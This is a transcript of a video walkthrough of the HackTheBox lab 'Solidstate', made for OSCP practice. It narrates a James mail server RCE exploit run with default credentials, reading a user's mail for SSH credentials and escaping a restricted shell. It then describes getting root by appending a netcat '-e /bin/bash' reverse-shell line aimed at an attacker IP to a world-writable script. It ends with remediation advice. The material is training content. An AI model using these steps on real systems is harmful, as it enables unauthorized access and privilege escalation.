Yo, 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 what's up, everybody? This is Toby with O-Line Security, and I am back with another TJ Null OSCP-like box from HTB. Okay, this box we're going to be dealing with today is called Solidstate. It is another TJ Null-like OSCP box. If you've been liking this series we've been doing, please do me a favor and smash the like button, y'all. Smash that like button so we can get these videos in front of other people. If there's a particular box you want us to compromise, you want us to do a walkthrough or maybe even a write-up, leave that in the comments below. We'll do our best to get that back to you. Alright, so I've already done this box. Alright, I'm going to throw that out there. I have done this box. I've done it a few times. I want to do this walkthrough as if, kind of sort of as if I didn't pop the box already, so it can be used as a good learning opportunity for a lot of you, right? Because the goal isn't always just to pop the box and get the shells. The goal is to learn why we were able to do those things and why we were able to do it. So enough and all that talking. Let's get into it. First things first, we're going to run our, actually before Nmap, I like to make a directory to work out of. So we'll make a directory called Solidstate. We'll make a directory called Solidstate. And then we'll go inside of that directory and let's start up tmux. Right, I have a little shortcut command to start it up here. So we are inside of tmux. Call this our scans window, and we're gonna run some nmap scans. All right, if you're familiar with our nmap jutsu, it does a bunch of different scans. Some of the scans are, it's a basic nmap. Well, it does a bunch of different nmap. Excuse me. It does a bunch of different nmap scans. The first few are these basic port scans that it's doing. It's looking for the top 25. Then it's going to do some other scans, version, vulnerability scans, full nmap scan, and some other stuff. But since we see that port 80 is open, let's go ahead and run GoBuster on this as well. So we'll use our GoBuster jutsu. That's going to get started. We can see some things that are really not any useful to us. Now let's go ahead and go to port 80. Let's see what we may be able to find on that web page. So we're going to open this browser up. I'm going to drag this over here so we can all see what I'm doing. And we will go to 10.10.10.51. This is a web page titled Solidstate Security. And as you go through it, you can see that they are offering some security services. There are some links in here. You can click throughout them just to see if they take you somewhere fancy. There's some input fields here. That we could use. There's also an email address here. Okay, let's make note of this email address. These pages don't really give us anything cool to work with. You can go and look at the source page if you want to. There's nothing really back there. In the source page, you know, we like to hope to find comments that have been left behind by developers. So nothing really going on here. The GoBuster results just give us pictures over here, and then the ad sets of the page over here. So nothing really actionable right now. Okay, our service scan, our version scan actually, from Nmap, if we look at the top pane here, our version scan brings back port 22 we knew was open, port 25, which is using a James server, port 80 we knew was open, has Apache on it, 110 and 119, which are both using the James server. Alright, so we see James server, so what the heck is that? What is James, right? We know what 25 is, that's default port for SMTP. Default port for POP3 is 110. 119 may be a James thing as well. So what do? We ask Google, hey, what's a James server? Right, and if we didn't know how to ask that question, right, because you may have not phrased it that way, you could have just copied and pasted this. Alright, let's copy and paste this. Let's do it that way. And immediately we get a bunch of RCE, remote command execution exploits, right? We can see that this is an email server, and this specific version of of James has an exploit, right, that allows for remote command execution. If we look at this, let's just look at the first one. I think a few of them are scripted differently, but let's look at this first one. Remote command execution. This is written in Python 3. These are modifications. Okay, it is, here are credentials to root, right? Credentials to the rat tool for James. Okay, don't know what a rat tool is yet. As we go through this, it tells you how to use it. It shows you the payload that it's running. Okay, it's connecting using those credentials. Here's the connection. Then it's creating a user. This is the name of the user that it's creating, right? It's gonna create this user and set the home directory, I believe, to bash completion.d. I could be phrasing that wrong. I could have butchered it, but we are creating a user. This is going to be the name of the user here, and I believe its home directory will be set here as well. Not entirely sure. I can't remember. And over here, we are sending that user our payload. Okay, and then once the payload is executed, or the payload will be executed when somebody logs in. Alright, so this is a good working script to at least start with. One thing to notice from this script is that it is logging into this remote administration tool. And it mentions that tool is usually running on port 4555. Alright, 4555. If we take a look at our Nmap scan, I'm just going to cancel out of this. I'm going to stop the GoBuster scan. If we take a look at our Nmap scan, the full one, ooh, I didn't get a chance to finish that. Okay. But the full one does have that port open up in it, and that's probably why I didn't finish. We lost connection to the box. Alright. So while that's running, we'll keep trucking along while we're trying to resolve that. So let's go ahead and copy this. We'll rerun the Nmap scan to show that full port. But it looks like that server is bugging out right now. So while that's doing that, we're going to copy this exploit down. I'm going to open up a new window. And we're going to vim exploit.py : set paste. Paste that in there. Go to the top of the screen with GG, with lowercase g. And then delete some spaces with lowercase d, hitting that twice. We're going to fix this to exploit. Alright, so now that script should be good. Let's check on our box. It's still down. Alright, so let's go ahead and run this script, or at least get the script started. So how do we use it? It comes with the usage example. Give the remote IP 10.10.10.51. You want to give our IP of 10.10.14.7, and then our listening port we will do 1234. Before we kick that off, we're going to start up a netcat listener on 1234. Still am not getting back any pings. Make sure we are good over here, we are good over there, and we are good. Okay, now let's send this. Let that do its thing. I'm going to rerun this Nmap scan. Okay, so this exploit right now is doing what it was scripted to do. So it's creating that user we talked about. It's connecting to the SMTP server, sending the payload. Remember, this is the payload right here that it's sending, and it's sending it to that user we created, right? And then when someone logs into the device, it will execute that script. Right, this payload will be executed. So now we have to figure out how to get somebody to log into this device. Unless somebody just magically logs in right now, this script will or this shell right here will get a connection. Until that happens, we have to try to log in as somebody else on this system. So what I'm going to do here is rename this to listener. And okay, this scan is still running. I wanted to show you that open port. Remember this script that we saw here? Let me see. This script right here told us that the James remote administration tool is running on port 4555. Right? Our nmap script actually brings that back to us. We just needed to finish successfully. The full scan is actually the last scan that runs, since it's scanning for all ports. Alright, so but while that's doing that, we know that the port is open. So I'm going to go ahead and use netcat to connect to that. 10.10.10.51 on 4555. Right, the reason I have all the V's there is just I want it as verbose as possible. Right, get as much information as possible just in case there's something wrong. I can try to see it maybe. Alright, so it's asking us to log in. We're just going to use the credentials that we got from this script. Right, this script has default credentials. And if you Google it, James server default creds, you should see that it is root. The username and password is root. So let's go ahead and do root. Do type help. It says welcome root, help for a list of commands. These are the commands that we have access to. Now remember, let's not forget what the goal is here, at least for now. We have this shell this listener that's waiting for our payload to be executed, and the only way it's going to get executed is if we're able to log in as another user. Now when I think about that, it probably does this right here, this shell that we may not matter anymore, right? If we find credentials to log in. So, but regardless, we need to find credentials either to log in via SSH or to execute this, or maybe even both. So let's do help. Now with that in mind, we have the capabilities of listing users inside of this remote administration tool, right? All the users that have access to James. So let's list those users. Remember, James is a mail server, so that means these users have mail accounts on this server, right? Now, another thing we can do with these users is change their passwords. So we can change the passwords of these users, log into their mail accounts to see if there's any useful information. Maybe there is, maybe there isn't. But keep this in mind, logging into those mail accounts doesn't necessarily activate or execute that payload for this shell to get a connection, right? Because this payload is waiting for somebody to log into the machine, not access the James server application. Okay, two different things. Now let's go ahead. What I did initially when I went through this, I changed everybody's password except for this user. I changed everybody's password except for that user, and then I just tried to log into each of these boxes individually using Telnet. I tried to use Netcat at first, but Netcat kept hanging when I was submitting the password. So, but the one that we do want to look at for sure is Mindy's account, because James doesn't have anything there. I don't think John and Thomas did. I know Mel Admin didn't, but Cindy does. I mean, Mindy. My bad, Mindy. My bad, girl. All right. So, Mindy, we reset her password. So, let's go ahead and log into her account. How are we going to log into her account, and why do we feel as if we can? Well, remember, our mmap scans, and this one is done. Our mmap scans showed that port 110 was open. Right? That's POP 3. POP 3 is open, so that means we could log into somebody's account if we had their password, right? POP 3 is a mail service we use to retrieve mail. SMTP is what we use to send mail. And this is that other port that I told you that we would see from the full scan that we use to log into this rat tool over here. So now let's go back to this telnet session and go to 10.10.51, and the port is 110. It's going to connect to that, so we have to talk to POP3 with POP3 commands. So this user command followed by user account, Mindy, hit enter. Okay, this pass command followed by Mindy's password, password 123. How do we know this password? We set it right here. Cool, now we are in Mindy's account. We use the list command to list out her emails. She has 2. The one we want to look at is the second one. So we'll use this retrieve or return command, and it gives us her credentials. We see Mindy's username and password. It says here are your SSH credentials to access the system. Remember to reset your password after your first login. Your access is restricted at the moment. Feel free to ask your supervisor to add any commands you need to your path. So we have her password. Cool. I'm going to exit out of this. Let me make sure I've copied this. So since we have our password, we can execute this shell, right? Execute this payload right here. Now to get out of this telnet session, I'm going to hit Control and the bracket button right here on the right hand side. That's what it looks like. I'm going to hit Control bracket, and then I'm going to enter close. That brings me out of this telnet session. Now that we're out of that, next thing we want to do, what is the next thing we want to do? I'm having a brain fart. Oh yeah, log into Mindy's account. But before I do that, I actually want to store this password. Mindy, boom. Just want to save her password. So her password is in our loop file now. So let's go ahead and try to SSH into Mindy's account. So we'll do SSH Mindy at 10.10.10.51. It may ask you to accept that fingerprint. So just hit yes and then hit enter. And if you've done everything we've done so far and it's working smoothly for you, you should have a shell right here that popped up with that connected to our listener. And if you look at, before we go down here to our listener, if you look at this box, this window pane that we use to log in as Mindy, you'll see that we are inside of a restricted shell, RBash, restricted shells for RBash. You can see that we are inside of a restricted shell. There are ways to escape this. Sometimes typing bash works, but we're not able to type anything in here right now. Sometimes typing bash works, sometimes logging in with the -T, and I believe hitting bash works. But yeah, all right, so we're on the box now. So what we want to do is, let's see, where's my, all right, there it is. Let's check our privileges. Well, we can see the user.txt file right there, all right? And there's a bin folder that we're not really going to use. We're going to check our, you always want to check your privileges, sudo-l, there's nothing really there. Now what I did was, and I'm going to fast forward it, what I did was copy linenum.sh, right? The privilege escalation script for Linux. It's kind of like linpeas, but it's way faster. Okay, I did that and it showed us a world writable file. There was a file that was being ran by root, and we had access to write to it. So that file is under ls opt. Right, so if I cd to the opt directory, we can see the James server, and we can see this temp.py file. If we open up the temp.py file, if we open tmp.py, my shell looks funny right now. Right, we're in a restricted shell, so this looks like it may be restricted as well. So this tmp.py file, this is where it starts. It's a Python file that is removing files and folders from this temp directory. So that's why this wildcard is here. So what we can, and this is being ran as root, right? tmp.py. This is being run as root. Okay, and it's writable by everybody. So we can just add our own. We can add to this right here. So I wish this didn't look like this right now. I don't know why my cursor. Let's see something. Let's see if we do this. Import pty spawn.pty. Import pty spawn.pty. What am I missing? Boom, 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 and bash. No, it doesn't do anything. So I'm just gonna go ahead and echo os.system netcat. We're gonna echo this Python liner, one liner over here. 10, 14.7, 1, 2, 3, 4. Actually, let's do 443. And we will put it inside of that pty file. Oh crap. Whoops. Accidentally broke out of my shell. And it breaks out of this shell too. So if we hit bash, it doesn't work. It doesn't escape it for us. So let's do this. Let's do hold on. Let's start this over. And then what's her password? Here we go. Alright, so we're good. Alright, and it looks better. CD opt. Sorry about that, you all. It's when I go to the opt directory. Okay, let's get out of it. I see what it is. So let's just do it from here. Let's echo. Let's do this the right way. Echo os.system. I want netcat, the -e/bin bash. Give me this. .14.7. Close that. And I want you to add that to tmp.pty. Unexpected token. What did I do? Echo. Where's this? Where's the unexpected token at? Well, good thing that it didn't finish, because that's not right. Netcat-e bin bash 10.10.14.7 443, and then that was that extra quote in there. tmp.py. So let's open that file and see what's in there. Alright, so it added our line at the bottom of it. So I'm going to quickly open up a netcat listener on 443. You can see that it added what we just echoed into the end of the file. It appended it to the file. So we're going to wait to see if this gives us a show back. It should. I think this runs like every 2 or 3 minutes. So we'll wait for that to go through. So while that is running, we should, I don't want to jinx it though. Alright, so that worked. Alright, so that worked. Say, who am I? We are root. Obviously, you can go ahead and upgrade this to skip bin bash. Whoops. Alright, so we're root. You can go ahead and get all the flags now. Now, before we go ahead and end this box, something we could have done. Whoops. Something we could have done over here. Let me close that. Exit out of this. Spell it right. Close that. We could have did this -t with a bash. Okay, this -t with a bash would have escaped that. See, now we're not in a restricted shell. We can do what we want now. Alright, we can change directories and have fun. Now that was Solidstate, y'all. This was a very fun box to work with. Get some extra practice on how we were able to exploit or even get our initial shell. Remember, this box is using a vulnerable version of the James server, right? It's vulnerable and it's using default credentials. Bad combination. The vulnerability, the exploit, is abusing the default cred. So I guess if we change the default credentials, we wouldn't have been able to use this Python 3 exploit that we found from ExploitDB. Also, we escalated our privileges because there was a file that did not have proper permissions, right? Its permissions were world writable, meaning that everybody and anybody could read, write, and execute the file. Execute a file that was being ran as root. Okay, so that's a big no-no. So we definitely want to change that, put that file in a directory where, well, just one, put it in a directory where nobody else has access to it but root, and also lock down the file's permissions so that nobody else can write to it besides root. Okay, if nobody else needs it, then nobody else should probably be able to read it either, especially if it's being run as root and it's running a script like that. You don't want to have people being able to append their own code and scripts to things that are being run as root. Alright, so that was pretty fun. If you enjoyed this box, please smash the like button so we can get this video in front of millions of other viewers across the world. Alright, we had fun. I hope you did. Leave a comment below if there's something that you want to see, a particular box you wanted to compromise. Other than that, y'all stay safe, have fun, make sure your loved ones know you love them, and I will see you all next time. Peace.